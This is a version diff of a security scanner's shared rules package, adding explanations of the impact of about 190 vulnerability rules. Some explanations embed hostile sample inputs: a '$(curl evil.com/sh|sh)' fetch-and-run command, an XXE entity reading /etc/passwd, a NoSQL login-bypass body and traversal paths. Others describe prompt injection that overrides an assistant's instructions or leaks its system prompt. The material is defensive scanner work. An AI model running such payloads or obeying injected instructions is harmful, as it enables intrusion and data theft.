xploitscan-shared-rules 1.4.0 → 1.6.0

package/dist/index.cjs CHANGED
@@ -39,6 +39,7 @@ __export(index_exports, {
39
39
  calculateGrade: () => calculateGrade,
40
40
  callSpreads: () => callSpreads,
41
41
  callbackHell: () => callbackHell,
42
+ classifyExposure: () => classifyExposure,
42
43
  clickjacking: () => clickjacking,
43
44
  clientComponentSecret: () => clientComponentSecret,
44
45
  clientSideAuth: () => clientSideAuth,
@@ -282,9 +283,225 @@ var RULE_IMPACTS = {
282
283
  VC008: "Without rate limiting, an attacker can flood your API with requests causing denial of service, brute-force attacks, or excessive cloud billing.",
283
284
  VC009: "With CORS set to allow all origins, any website can make authenticated requests to your API from a user's browser, enabling cross-site data theft.",
284
285
  VC010: "Hiding UI elements without server-side checks means an attacker can call your API directly and bypass the restriction entirely.",
285
- VC011: "The NEXT_PUBLIC_ prefix exposes this value in the browser bundle. If it's a secret, anyone viewing your site's JavaScript can extract it."
286
+ VC011: "The NEXT_PUBLIC_ prefix exposes this value in the browser bundle. If it's a secret, anyone viewing your site's JavaScript can extract it.",
287
+ VC012: "While Firebase API keys aren't strictly secret, an unrestricted key lets attackers abuse your project's quotas, run up Firebase costs, or hit endpoints that should be locked down by App Check or HTTP referrer rules.",
288
+ VC013: "Performing privileged operations with the anon key either fails outright or silently bypasses RLS in unsafe ways, leading to leaked rows or broken auth checks that any logged-in user can exploit.",
289
+ VC014: "An unignored .env file gets committed on the next git add, leaking database passwords, API keys, and OAuth secrets to anyone with repo access \u2014 including the entire internet if the repo is public.",
290
+ VC015: "If any user-controlled string reaches eval() or new Function(), an attacker gets arbitrary JavaScript execution in your app \u2014 full session takeover in the browser, or RCE on the server in Node.",
291
+ VC016: "An attacker can craft a link from your domain that redirects victims to a phishing page or malware download, abusing your domain's trust to bypass user suspicion and email filters.",
292
+ VC017: "Cookies missing httpOnly can be stolen by any XSS payload; missing secure leaks them over HTTP; missing sameSite enables cross-site request forgery against logged-in users.",
293
+ VC018: "A leaked Clerk, Auth0, or NextAuth secret key lets an attacker mint valid sessions for any user in your app, fully impersonating accounts and bypassing every authentication check.",
294
+ VC019: "With nodeIntegration on or contextIsolation off, any XSS in your renderer becomes RCE on the user's machine \u2014 the page can require('child_process') and run shell commands as the user.",
295
+ VC020: "Without a CSP, a single XSS bug becomes catastrophic \u2014 the attacker can load scripts from anywhere, exfiltrate data to their own server, and inject keyloggers with no browser-side defense in depth.",
296
+ VC021: "An attacker-controlled path (../../../.ssh/id_rsa) sent through IPC lets the renderer read or overwrite arbitrary files on disk \u2014 SSH keys, .env files, browser cookie databases.",
297
+ VC022: "Stored XSS in exported HTML lets an attacker who plants malicious content in a document run JavaScript in every viewer's browser \u2014 stealing tokens, hijacking the renderer, or pivoting via Electron APIs.",
298
+ VC023: "By sending a JSON body with __proto__ or constructor.prototype, an attacker can corrupt every object in your process \u2014 bypassing auth checks, mutating config flags, or triggering RCE through gadget chains in popular libraries.",
299
+ VC024: "An attacker (or a buggy client) uploading multi-gigabyte payloads can fill your disk or exhaust process memory, taking the service down for everyone.",
300
+ VC025: "A filename like ../../etc/passwd or one containing shell metacharacters lets an attacker overwrite files outside the upload directory or inject commands when the filename is later passed to a shell.",
301
+ VC026: "A malicious link inside the app can navigate the entire window away from your trusted UI to a phishing site that looks identical, harvesting credentials or pushing fake updates.",
302
+ VC027: "Without X-Content-Type-Options: nosniff and similar headers, browsers may execute uploaded files as scripts and leak full referrer URLs containing tokens to third parties.",
303
+ VC028: "When user input controls API URLs, model names, or keys without validation, attackers can redirect calls to their own endpoint, swap to expensive models on your bill, or smuggle in injected parameters.",
304
+ VC029: "Code that trusts postMessage or custom event payloads without origin/type checks lets any embedded iframe or extension trigger sensitive actions in your app's context.",
305
+ VC030: "Deserializing attacker-controlled pickle, YAML, or PHP unserialize data is straight-line RCE \u2014 published gadget chains turn a single POST into a remote shell on your server.",
306
+ VC031: "Anyone who reads the source can sign their own JWTs, forging tokens for any user including admins. There is no way to detect the forgery server-side.",
307
+ VC032: "Without HSTS and HTTPS enforcement, an attacker on the network (coffee shop wifi, malicious ISP) can intercept the first request, downgrade to HTTP, and steal session cookies and credentials.",
308
+ VC033: "Debug mode exposes stack traces, environment variables, and internal routes \u2014 handing attackers a map of your stack, your secrets, and often a remote shell via a debug REPL endpoint.",
309
+ VC034: "Math.random() output is predictable from a few samples. Tokens, password reset codes, and session IDs generated this way can be guessed, letting an attacker take over accounts.",
310
+ VC035: "A link like yourapp.com/login?next=evil.com sent in a phishing email looks legitimate to the victim and to email filters, but lands them on the attacker's site after login.",
311
+ VC036: "Uncaught React errors render raw stack traces to users, leaking file paths, component names, and sometimes secrets from props \u2014 a free recon gift to an attacker probing your app.",
312
+ VC037: "Stack traces in API responses reveal your file structure, library versions, and ORM internals, letting attackers fingerprint known CVEs and craft targeted exploits.",
313
+ VC038: "Validating only the file extension lets an attacker upload a .jpg that is actually a PHP webshell or HTML with embedded scripts, leading to stored XSS or RCE when the file is served.",
314
+ VC039: "Without a lockfile, every install resolves fresh versions \u2014 a typosquatted or compromised dependency upgrade lands in production without anyone noticing, exactly the vector behind several recent npm supply-chain attacks.",
315
+ VC040: "An exposed .git directory lets anyone download your entire repository \u2014 every secret you ever committed (even ones you thought you removed), full source code, and commit history.",
316
+ VC041: "An attacker can make your server fetch internal URLs like http://169.254.169.254/ (AWS metadata) or http://localhost:5432, exfiltrating cloud credentials or pivoting to internal services.",
317
+ VC042: "Spreading req.body into a User.create() lets an attacker register with isAdmin: true or set verified: true on their own account, escalating privileges with a single request.",
318
+ VC043: "An attacker can recover an API key or session token one byte at a time by measuring response time differences, eventually guessing the full secret without ever seeing it.",
319
+ VC044: "An attacker injecting newlines into log messages can forge fake log entries to cover their tracks, spoof other users' actions, or break log parsers and SIEM rules.",
320
+ VC045: "Allowing 6-character or dictionary passwords means most accounts fall in seconds to a credential-stuffing list, leading to mass account takeover.",
321
+ VC046: "Without session ID rotation on login, an attacker who tricks a victim into using a known session ID is then logged in as the victim once they authenticate \u2014 full account takeover.",
322
+ VC047: "Without lockout or rate limiting, an attacker can throw millions of leaked credential pairs at /login until they find ones that work, taking over user accounts en masse.",
323
+ VC048: 'MongoDB operators in JSON bodies ({"password": {"$ne": null}}) bypass login checks entirely, dump collections, or modify documents \u2014 the NoSQL equivalent of SQL injection.',
324
+ VC049: "Database credentials in committed config files give anyone with repo access a direct connection string to production \u2014 read all data, modify any row, drop tables.",
325
+ VC050: "Without TLS, database passwords and every row of data crosses the network in plaintext, readable by anyone tapping the connection \u2014 including cloud providers' internal logs.",
326
+ VC051: "With introspection on, any unauthenticated user can dump your full GraphQL schema \u2014 every field, every mutation, every internal type \u2014 handing attackers a complete attack surface map.",
327
+ VC052: "An attacker posting a 10GB JSON body to your API exhausts process memory and crashes the server, taking your app offline with one curl command.",
328
+ VC053: "Hardcoded IPs in allowlists become stale and either grant access to whoever now holds the address or break legitimate users when infrastructure rotates \u2014 both end in a security incident.",
329
+ VC054: "Any XSS bug \u2014 even one in a third-party script \u2014 can read every token in localStorage and send it to an attacker. Stolen tokens often have no expiry and survive password resets.",
330
+ VC055: "A .map file in production lets anyone download the original, unminified source code of your app \u2014 including comments, internal class names, and any logic you assumed was hidden by minification.",
331
+ VC056: "Without frame-ancestors or X-Frame-Options, an attacker can iframe your app under a fake UI, tricking logged-in users into clicking buttons that perform real actions on their account.",
332
+ VC057: "Wildcard IAM permissions mean a single compromised credential \u2014 a leaked CI token, an SSRF-leaked metadata role \u2014 gives the attacker full account takeover, including the ability to delete every resource.",
333
+ VC058: "A vulnerability in your app or any container library becomes root inside the container. Combined with a kernel exploit or a misconfigured volume mount, that's host root.",
334
+ VC059: "Binding to 0.0.0.0 on a developer laptop or shared server exposes Postgres, Redis, or Mongo to anyone on the local network \u2014 typically with no password, since it was meant to be local-only.",
335
+ VC060: "MD5/SHA-256 password hashes can be cracked at billions of attempts per second on a GPU. A leaked database means every user's password is recovered within hours, ready for credential stuffing.",
336
+ VC061: "With certificate verification off, any attacker on the network path can transparently intercept HTTPS calls \u2014 stealing API keys, modifying webhook responses, or returning poisoned data from upstream services.",
337
+ VC062: "A hardcoded encryption key in source code means every encrypted record in the database is decrypt-able by anyone with repo access. A reused IV in CBC/GCM modes also leaks plaintext directly.",
338
+ VC063: "dangerouslySetInnerHTML on user-controlled strings is XSS-by-design \u2014 an attacker who lands content in your database (a comment, a profile bio, a chat message) gets script execution in every viewer's browser.",
339
+ VC064: "Server Actions are publicly callable URLs even though they look like function calls. Without auth checks, any visitor can invoke them with arbitrary args, bypassing every UI restriction.",
340
+ VC065: "An unauthenticated /api/ route is just a public URL \u2014 attackers find them via bundle analysis or wordlists and call them directly to read or modify data.",
341
+ VC066: "Once a secret reaches a 'use client' component, Next.js inlines it into the JavaScript bundle. Anyone visiting the site can extract it from the page source and use your API as you.",
342
+ VC067: "Custom URL scheme handlers that act on parameters without validation let any webpage or app trigger sensitive actions \u2014 opening attacker URLs in your auth context, transferring funds, or wiping data.",
343
+ VC068: "AsyncStorage is plaintext on disk. A jailbroken phone, a forensic backup, or a malicious app on Android with debug access can read every stored token, password, or API key.",
344
+ VC069: "Without certificate pinning, anyone who can install a custom CA on the device (corporate MDM, compromised phone, malicious VPN) can decrypt all traffic to your API and modify responses.",
345
+ VC070: 'android:debuggable="true" in production lets anyone with adb access attach a debugger, dump memory containing tokens and PII, and bypass any client-side security check in the app.',
346
+ VC071: "DEBUG=True in production renders Django's yellow error page on every exception \u2014 exposing source code lines, the full settings dictionary (including SECRET_KEY and database URLs), and installed apps.",
347
+ VC072: "A hardcoded Flask SECRET_KEY lets anyone with the source forge session cookies and CSRF tokens for any user, fully impersonating accounts including admins.",
348
+ VC073: "pickle.loads() on untrusted input is RCE-by-design \u2014 published one-line payloads spawn a reverse shell. If any user-controlled bytes reach pickle, your server is compromised.",
349
+ VC074: "Disabling CSRF on a state-changing view lets an attacker's website trigger requests in the victim's browser \u2014 transferring funds, changing email, deleting data \u2014 all using the victim's logged-in session.",
350
+ VC075: "Writing ${{ github.event.issue.title }} into a run: block executes whatever shell payload an attacker puts in an issue title \u2014 running with your repo's secrets and write tokens, leading to repo takeover.",
351
+ VC076: "Hardcoded tokens in CI YAML are visible in every fork, every PR diff, and every public Action run log \u2014 attackers scrape these constantly and use the credentials within minutes of commit.",
352
+ VC077: "Wildcard CORS in serverless config combined with credentials means any attacker site can read authenticated responses from your API using the victim's cookies \u2014 full data theft.",
353
+ VC078: "A privileged container is essentially root on the node \u2014 kernel modules can be loaded, the host filesystem can be mounted, and pivoting to other pods or stealing kubelet credentials is trivial.",
354
+ VC079: "A JWT library that accepts alg:none lets an attacker strip the signature from a token, change the user ID to admin, and the server treats it as valid \u2014 instant privilege escalation.",
355
+ VC080: "A regex like (a+)+$ on a 30-character malicious input takes minutes of CPU to evaluate. An attacker sends a few of these and your single Node.js process is stuck \u2014 DoS with no bandwidth needed.",
356
+ VC081: 'An XML parser with external entities enabled lets an attacker include <!ENTITY xxe SYSTEM "file:///etc/passwd"> in a SOAP/SAML payload, reading server files or pivoting to internal HTTP services.',
357
+ VC082: "Rendering a Jinja2/Handlebars/EJS template from a user-controlled string is RCE \u2014 attackers can break out of the template syntax to execute Python or Node code in the server process.",
358
+ VC083: "Java deserialization with Apache Commons or Spring on the classpath is essentially guaranteed RCE \u2014 public gadget chains turn a single readObject call into a remote shell.",
359
+ VC084: "Without integrity= on a CDN script tag, a CDN compromise (or a takeover of an unmaintained domain) means attacker-controlled JS runs in every visitor's browser as if you served it.",
360
+ VC085: "Open admin or actuator endpoints often expose env vars, heap dumps, or thread state \u2014 and many ship with default-credential admin UIs that take over the application with no exploit needed.",
361
+ VC086: "ws:// transmits messages in plaintext. Anyone on the network \u2014 public wifi, malicious ISP, an MITM proxy \u2014 can read or modify chat messages, real-time data, or auth handshakes.",
362
+ VC087: "Without HSTS, a single user typing yourdomain.com (defaulting to HTTP) lets an MITM attacker intercept the redirect, downgrade the connection, and steal cookies before HTTPS ever happens.",
363
+ VC088: "Tokens in URLs end up in web server access logs, the browser's history, the Referer header sent to every third-party script, and bookmarks \u2014 a long, lossy trail of credential exposure.",
364
+ VC089: "Without Content-Disposition: attachment, an uploaded HTML file is rendered inline at your origin \u2014 making file uploads a stored XSS vector against any user who clicks the download link.",
365
+ VC090: "A spoofed Host header in the request reflects into a redirect URL, sending password-reset emails or OAuth callbacks to an attacker-controlled host that captures the token.",
366
+ VC091: "TOCTOU race conditions let an attacker swap a file (or database row) between your check and your action \u2014 e.g. checking permissions on a path then opening it after a symlink is swapped in.",
367
+ VC092: "Spreading req.body into objects you later use as lookups (settings, permissions, options) lets an attacker pollute the prototype chain \u2014 every object in the process now inherits attacker-set properties.",
368
+ VC093: "An attacker requesting filename=../../../etc/passwd reads any file the server process can access, including .env files, SSH keys, and other tenants' uploaded data on shared hosts.",
369
+ VC094: "Any user-controlled string reaching exec() or system() means an attacker runs arbitrary shell commands on your server \u2014 installing backdoors, dumping the database, or pivoting into your VPC.",
370
+ VC095: "A localhost CORS allowlist trusts anything running on the user's machine \u2014 including malicious browser extensions or local development servers spun up by other apps to phish your API.",
371
+ VC096: "Insecure gRPC channels send service-to-service traffic in plaintext, including any auth tokens in metadata \u2014 a compromised pod or a network sniffer reads everything.",
372
+ VC097: "console.log statements left around can leak tokens, PII, and internal IDs into the browser console \u2014 visible to any user, browser extension, or screen-recording tool, and to anyone reviewing console output during support sessions.",
373
+ VC098: "readFileSync in a request handler blocks Node's single event loop. One slow disk read holds up every concurrent request, turning normal load into a cascading outage.",
374
+ VC099: "Each re-render adds another listener that's never removed \u2014 over time the page leaks memory, slows down, and eventually crashes the tab on long-running screens like dashboards.",
375
+ VC100: "An N+1 query pattern means a list of 1,000 items triggers 1,000+ database round-trips. Pages that work in dev with 10 rows time out in production and crush the database under load.",
376
+ VC101: "Importing all of lodash or moment adds 70-300KB to every page load. Mobile users on slow networks see your app freeze for seconds before any UI appears.",
377
+ VC102: "Heavy synchronous work on the main thread freezes the browser's UI \u2014 buttons stop responding, scroll jitters, and users mash refresh, often hitting your API harder than necessary.",
378
+ VC103: "TODO/FIXME comments often mark known-broken security or correctness paths that were meant to be fixed before launch and were forgotten \u2014 an attacker grepping the source bundle can find them as fast as you can.",
379
+ VC104: "Silently swallowing errors hides bugs that cause data loss, failed payments, or security check bypasses \u2014 by the time a user complains, you've lost the diagnostic trail.",
380
+ VC105: "Deeply nested promise chains are a major source of subtle bugs (missed catches, wrong error context) and slow incident response \u2014 the next on-call engineer can't read it during an outage.",
381
+ VC106: "Magic numbers like if (status == 7) hide intent and make safe refactors impossible \u2014 when the meaning of 7 changes, every callsite has to be hunted down by hand.",
382
+ VC107: "Without S3 server-side encryption, a misconfigured bucket policy or a stolen backup tape means data sits at rest in the clear \u2014 failing SOC 2, HIPAA, and GDPR controls during audits.",
383
+ VC108: "0.0.0.0/0 on all ports means your EC2/RDS/ElastiCache instance is reachable from the entire internet. Internet-wide scanners find it in minutes and start credential-stuffing default ports.",
384
+ VC109: "A publicly accessible RDS instance is one weak password (or one CVE in the DB engine) away from full database compromise \u2014 and they're constantly probed by automated scanners.",
385
+ VC110: "Without CloudTrail, a compromised AWS credential leaves no audit trail \u2014 you can't tell what the attacker accessed, whether they're still in, or what data was exfiltrated.",
386
+ VC111: "Lambda outside a VPC can't reach private RDS or ElastiCache safely without exposing them publicly, and lacks the network controls that contain blast radius if the function is exploited.",
387
+ VC112: "FROM node:latest builds a different image every week. A breaking upstream change crashes production at 2am, or a poisoned tag silently swaps in malicious code on the next deploy.",
388
+ VC113: "COPY . . without a .dockerignore bakes your .env, .git history, and editor swap files into the published image \u2014 anyone who pulls the image extracts every secret you've ever committed.",
389
+ VC114: "Each exposed port is one more thing to misconfigure. Forgotten debug or admin ports (Redis 6379, Elastic 9200, Mongo 27017) are the most common entry point in cloud breaches.",
390
+ VC115: "base64 is encoding, not encryption. A leaked Kubernetes manifest or kubectl get secret access from a compromised pod hands the attacker every credential in the namespace in plaintext.",
391
+ VC116: "A pod without resource limits can OOM-kill its neighbors, hog every CPU on the node, or spiral into infinite memory growth that takes the whole cluster's noisy-neighbor protection down.",
392
+ VC117: "User input in a file path lets attackers read /etc/passwd, app source code, or other tenants' files; in write contexts it overwrites system binaries or config to gain code execution on next run.",
393
+ VC118: "PII in logs ends up in CloudWatch, Datadog, Sentry, and engineer laptops \u2014 multiplying the surface area of any breach and triggering GDPR/HIPAA breach-notification obligations even if the app DB is intact.",
394
+ VC119: "A leaked OAuth client_secret lets an attacker impersonate your application, exchanging codes for tokens and acting as your app against any user who has previously authorized \u2014 silent account takeover.",
395
+ VC120: "Without a state parameter in OAuth, an attacker can stitch a victim's session to the attacker's account (account injection), or CSRF the callback to attach the attacker's identity to the victim.",
396
+ VC121: "An action pinned to @main runs whatever the maintainer (or anyone who compromises the repo) pushes next. Pin to a SHA so a supply-chain compromise of a third-party action can't push code into your CI.",
397
+ VC122: "TLS 1.0/1.1 are vulnerable to BEAST, POODLE, and Lucky 13. Modern compliance frameworks (PCI DSS, HIPAA) explicitly forbid them and audits will fail until disabled.",
398
+ VC123: "A 1024-bit RSA key is within reach of well-funded attackers and trivial to factor by 2030. Any key signing tokens or TLS certs needs to be 2048-bit minimum, ideally 3072+.",
399
+ VC124: "ECB mode encrypts identical blocks identically, so patterns in the plaintext (think the famous ECB-encrypted Linux penguin) leak through ciphertext \u2014 useless for any real data.",
400
+ VC125: "Predictable reset tokens, tokens that don't expire, or username-enumeration in the reset flow let attackers take over accounts via the password-reset endpoint without ever knowing the original password.",
401
+ VC126: "Terraform state files contain plaintext copies of every resource attribute \u2014 RDS passwords, IAM keys, TLS private keys. Committing one to git is equivalent to leaking your full infrastructure credentials.",
402
+ VC127: "Unauthenticated DELETE/PUT/PATCH endpoints let any internet user destroy or modify data \u2014 the most common 'how was your whole user table wiped overnight' incident.",
403
+ VC128: "Manually parsing Content-Length and Transfer-Encoding behind a CDN or load balancer can desync the proxy and origin, letting attackers smuggle requests that bypass auth or hit other users' sessions.",
404
+ VC129: "Storing SSNs, credit cards, or health data unencrypted at the column level means a single read-only DB leak (backup, replica, log) is a full PII breach with mandatory disclosure and major regulatory fines.",
405
+ VC130: "Without rate limiting on auth routes, attackers throw credential lists at /login or trigger thousands of password-reset emails to specific accounts \u2014 credential stuffing and email-bombing on demand.",
406
+ VC131: "A dependency with a known CVE means a public exploit may already work against your app. Attackers scan for vulnerable versions of common libraries and pivot in within hours of disclosure.",
407
+ VC132: "A leaked Anthropic API key lets attackers run unlimited Claude API calls on your account \u2014 burning through your quota in hours and racking up thousands of dollars in charges before you notice.",
408
+ VC133: "A leaked GitHub PAT gives attackers read/write access to your repos depending on scopes \u2014 they can push backdoored commits, steal private code, exfiltrate Actions secrets, and pivot to npm publish tokens stored as repo secrets.",
409
+ VC134: "A leaked SendGrid key lets attackers send email from your verified domain \u2014 phishing your customers from a real-looking address that passes SPF/DKIM/DMARC and shreds your sender reputation.",
410
+ VC135: "A leaked Slack token reads your workspace's messages and channel history \u2014 exposing internal conversations, customer data shared in support channels, and any secrets pasted in DMs (which is most secrets, in practice).",
411
+ VC136: "A leaked GCP service account JSON is project-level access \u2014 depending on roles, attackers can spin up cryptominers, dump every Cloud Storage bucket, or escalate to organization admin.",
412
+ VC137: "A leaked Shopify access token exposes your full store: customer PII (names, emails, addresses), order history, payment data scope, and the ability to modify products or refund orders.",
413
+ VC138: "A leaked GitLab token grants repository and pipeline access \u2014 attackers push commits, trigger CI to run malicious code with all your CI secrets, and exfiltrate any private project the token can see.",
414
+ VC139: "A leaked Twilio key sends premium-rate SMS and international calls on your dime \u2014 toll fraud cases regularly hit five figures overnight before account locks kick in.",
415
+ VC140: "A leaked Mailgun key sends email from your domain \u2014 attackers launch phishing campaigns that pass DMARC because they really do come from you, destroying your sender reputation and customer trust.",
416
+ VC141: "A leaked Datadog key exposes logs, metrics, traces, and infrastructure topology \u2014 attackers map your entire stack, find vulnerable services from APM data, and grep logs for the next set of secrets.",
417
+ VC142: "A leaked Vercel token deploys arbitrary code to your production sites and reads every environment variable \u2014 which contains your other secrets, making this one leak a gateway to all the rest.",
418
+ VC143: "The Supabase service_role key bypasses every RLS policy. A leaked key means an attacker reads every user's data, deletes any row, and creates admin accounts at will \u2014 full database compromise.",
419
+ VC144: "A leaked Vault token is a master key \u2014 depending on policies it unlocks database creds, AWS roles, TLS certs, and every other secret your infra depends on. One leak compromises the whole vault.",
420
+ VC145: "A leaked Pinecone key lets attackers read or wipe every vector index \u2014 exfiltrating embedded user data (often containing PII or business documents) and corrupting your RAG retrieval to inject prompts.",
421
+ VC146: "A token in a query string ends up in your reverse proxy logs, your CDN logs, the user's browser history, and the Referer header sent to every third-party tracker on your page \u2014 multi-channel credential exposure.",
422
+ VC147: "Logging a token writes it to stdout, persists it through your log pipeline (Datadog, Sentry, CloudWatch), and lands it on engineer laptops via tail -f \u2014 turning a private value into one shared across your whole observability stack.",
423
+ VC148: "Returning secrets in error JSON exposes them to whoever can trigger the error \u2014 often unauthenticated callers \u2014 and lands them in client-side error tracking like Sentry where they're visible to many engineers.",
424
+ VC149: "DefinePlugin and Vite's define inline values directly into the bundled JS at build time. Any 'secret' configured this way ships in the page source for every visitor.",
425
+ VC150: "Tokens in <meta> tags or data-* attributes are visible to view-source, browser extensions, search engine crawlers, and the Wayback Machine \u2014 effectively public the moment the page loads.",
426
+ VC151: "Secrets in command-line arguments show up in ps aux, /proc/*/cmdline, shell history, and audit logs, readable by any other user on the same machine, including unprivileged co-tenants on shared hosts.",
427
+ VC152: "Without signature verification, an attacker can POST fake Clerk session events to create admin users, fake GitHub events to trigger deploys, fake Resend events to mark invoices paid \u2014 every webhook turns into an unauthenticated mutation endpoint.",
428
+ VC153: "Reflecting Origin into Access-Control-Allow-Origin while Allow-Credentials is true is worse than wildcard CORS \u2014 browsers will send cookies, so any malicious site reads authenticated responses from your API as the logged-in victim.",
429
+ VC154: "Without schema validation, attackers send oversized strings, unexpected types, or nested JSON that triggers crashes, ORM coercion bugs, or injection via fields the code didn't expect.",
430
+ VC155: "Without rate limiting on routes that call OpenAI/Anthropic/Cohere, a single malicious user (or a logged-in attacker with a script) can exhaust your monthly LLM budget in minutes \u2014 denial of wallet.",
431
+ VC156: "An unpaginated list endpoint returns every row to the caller. Once the table grows, a single GET dumps gigabytes, OOMs the server, and exfiltrates the entire user list to anyone who finds the URL.",
432
+ VC157: "Prisma Studio or Drizzle Studio in production is a public database admin UI \u2014 anyone who finds the URL gets full read/write access to every table with no auth.",
433
+ VC158: "A route like /api/orders/:id without an ownership check lets an attacker increment IDs and read every other user's orders, invoices, messages, or files \u2014 the most common real-world data breach pattern.",
434
+ VC159: "A leaked Cohere API key burns through your tokens budget on attacker-driven inference requests, racking up bills and potentially exposing usage history that reveals customers' prompts.",
435
+ VC160: "A leaked Replicate token (r8_*) lets attackers run expensive GPU models \u2014 image and video generation can rack up hundreds of dollars per hour billed to your account.",
436
+ VC161: "A leaked Mistral API key burns through your inference budget on attacker workloads, with no usage caps you can rely on until the bill arrives.",
437
+ VC162: "A leaked Together AI key lets attackers run any open-source model on the platform on your tab \u2014 Llama, Mixtral, Stable Diffusion \u2014 burning through credits in minutes.",
438
+ VC163: "A leaked Groq key (gsk_*) lets attackers run Groq's high-throughput LPU inference at your expense, exhausting credits and rate limits before you notice.",
439
+ VC164: "A leaked Fireworks AI key (fw_*) lets attackers run hosted models on your account, racking up per-token charges with no warning.",
440
+ VC165: "A leaked Postmark token sends transactional email from your domain \u2014 an attacker phishes your real customers from your real sender address, passing every spam filter.",
441
+ VC166: "A leaked Resend key (re_*) sends email from your verified domain \u2014 phishing campaigns from a real sender address torch your domain reputation and trick customers who trust your emails.",
442
+ VC167: "A leaked Loops key exposes your entire customer email list and lets attackers send authorized-looking emails from your domain \u2014 a customer-list exfiltration plus phishing weapon in one.",
443
+ VC168: "A leaked Cloudflare token, depending on scopes, lets attackers rewrite DNS to point your domain at their server, disable your WAF, or wipe R2 buckets \u2014 full traffic and data control.",
444
+ VC169: "A leaked Fastly token lets attackers purge your cache (causing origin overload), inject malicious VCL to redirect traffic, or modify how every user's request is served.",
445
+ VC170: "A leaked Netlify PAT (nfp_*) deploys arbitrary code to your sites and reads every env var on every site \u2014 including secrets for your APIs, databases, and other providers.",
446
+ VC171: "A leaked Railway token reads every environment variable across your projects (database URLs, third-party keys), redeploys services with attacker code, and accesses connected databases directly.",
447
+ VC172: "A leaked Fly.io token (FlyV1 fm2_*) deploys arbitrary apps in your org, reads and modifies secrets on machines, and gives attackers a foothold inside your private Fly network.",
448
+ VC173: "A leaked Algolia admin key replaces every indexed record \u2014 attackers swap your search results for SEO spam or phishing links, and create their own scoped keys for persistent access.",
449
+ VC174: "A leaked Qdrant key reads and modifies every vector collection \u2014 attackers exfiltrate embedded user content and can poison RAG retrieval to inject prompts into AI features.",
450
+ VC175: "A leaked Weaviate key gives attackers full access to embeddings and metadata for every indexed document, exfiltrating private content and corrupting search results.",
451
+ VC176: "A leaked Linear key (lin_api_*) exposes your private roadmap, customer-reported bugs (often containing reproduction steps for unpatched issues), and internal team conversations.",
452
+ VC177: "A leaked Notion integration token (secret_*) reads every page and database the integration touches \u2014 typically the most sensitive content in a company: financial models, hiring decisions, security runbooks.",
453
+ VC178: "A leaked Discord bot token gives attackers your bot's full identity in every server it's in \u2014 they can DM users, mass-spam channels, exfiltrate messages per intent scopes, and ban or kick members.",
454
+ VC179: "A leaked Intercom token exposes every customer conversation and contact record \u2014 support history, screenshots customers shared, and PII tied to email and company data.",
455
+ VC180: "A leaked Sentry token (sntrys_*) exposes captured stack traces and PII from errors, and lets attackers tamper with releases or upload malicious source maps that map errors to attacker-controlled code.",
456
+ VC181: "A leaked Better Stack source token lets attackers flood your log retention with junk to mask their activity elsewhere or rack up your ingestion bill.",
457
+ VC182: "A leaked Highlight.io key exposes recorded session replays \u2014 including any text users typed (passwords, credit cards) that wasn't manually masked, plus full console logs.",
458
+ VC183: "A leaked Plivo token enables toll fraud \u2014 attackers dial premium-rate numbers and send international SMS billed to your account, often racking up thousands before account locks trigger.",
459
+ VC184: "pull_request_target with a checkout of the PR head is the canonical critical CI vulnerability \u2014 any forked PR can run code (install scripts, lint hooks, build steps) with your repo's write tokens and every secret in your environment, leading to repo takeover and secret exfiltration.",
460
+ VC185: "permissions: write-all gives every step in the workflow full repo, packages, and deployments write access. A single compromised action \u2014 direct or transitive \u2014 can push commits, alter releases, and steal every secret the job has access to.",
461
+ VC186: "A malicious PR title or commit message containing $(curl evil.com/sh|sh) gets executed as shell on your runner with your repo's secrets \u2014 same root cause as SQL injection, just in a CI context.",
462
+ VC187: "Passing repo secrets via with: hands them to the action's source code and every dependency it pulls. The 2025 tj-actions/changed-files compromise stole CI secrets exactly this way; minimize what you pass and prefer pinning by SHA.",
463
+ VC188: "ADD auto-extracts archives and fetches URLs without integrity checks \u2014 both are foot-guns. Auto-extraction enables zip-slip; URL fetches break reproducibility and fetch whatever the upstream server hands back, even if compromised.",
464
+ VC189: "RUN curl ... | sh executes whatever the upstream server returns at build time \u2014 no checksum, no pin. A compromise of the install host (or a subdomain takeover) bakes attacker code into your image with no audit trail.",
465
+ VC190: "Without HEALTHCHECK, an orchestrator can't tell that a deadlocked or DB-pool-exhausted container is broken \u2014 it stays in the load balancer rotation serving 500s to users until a human notices and intervenes.",
466
+ VC191: "verify=False disables TLS validation \u2014 anyone on the network path between your server and the upstream can intercept and modify the response, potentially feeding poisoned data into your app or stealing the API key in the request.",
467
+ VC192: "Jinja2 with autoescape=False renders user input as raw HTML \u2014 any field a user controls becomes a stored XSS vector, executing JavaScript in every other user's browser when the template renders.",
468
+ VC193: "tempfile.mktemp() returns a path without creating the file. An attacker with local access can win the race by creating a symlink at that path before your code opens it, redirecting your write to /etc/passwd or any other file your process can write.",
469
+ VC194: "mark_safe() with non-literal input tells Django to skip HTML escaping on attacker-influenced content \u2014 turning the whole page into stored XSS that runs in every viewer's browser.",
470
+ VC195: "AutoAddPolicy silently trusts whatever host key is presented on first connect \u2014 an attacker MITM-ing the SSH session presents their own key, gets accepted, and intercepts every command and credential in the session.",
471
+ VC196: "ALLOWED_HOSTS = ['*'] disables Host header validation. Attackers craft requests with fake Host headers used in password-reset URLs and cache keys \u2014 poisoning password reset emails to point at attacker domains and corrupting CDN caches.",
472
+ VC197: "PyJWT decode without an algorithms= allowlist accepts whatever algorithm the token claims, including alg:none. Attackers strip the signature, change the user_id to admin, and the server treats the forged token as valid.",
473
+ VC198: "User input concatenated into a model message lets attackers override your assistant's instructions \u2014 exfiltrating system prompts, jailbreaking content rules, or hijacking the assistant to act in the attacker's interest within the user's session.",
474
+ VC199: "A system prompt is the highest-trust part of an LLM context. Any non-literal data interpolated into it lets attackers modify the assistant's identity, safety rules, or tool boundaries \u2014 silently turning your AI feature into theirs.",
475
+ VC200: "Models can be prompted to emit <script> tags or javascript: links. Rendering output via dangerouslySetInnerHTML or innerHTML turns prompt injection into ordinary XSS \u2014 full session hijack on any user who triggers the attacker-controlled response.",
476
+ VC201: "A vector query with no user/tenant filter returns matches from every customer's embedded documents. In a multi-tenant RAG app, User A's question retrieves User B's private docs and the LLM cheerfully reads them aloud \u2014 silent cross-tenant data leak.",
477
+ VC202: "Inserting embeddings without a user/tenant tag makes per-user filtering at query time impossible \u2014 even if you remember to filter on read, there's nothing to filter on. This is the source-side fix for the RAG cross-tenant leak.",
478
+ VC203: "An LLM call without max_tokens lets attackers craft inputs that maximize output length, generating expensive responses on every request \u2014 denial-of-wallet that drains your monthly budget or trips rate limits for legitimate users.",
479
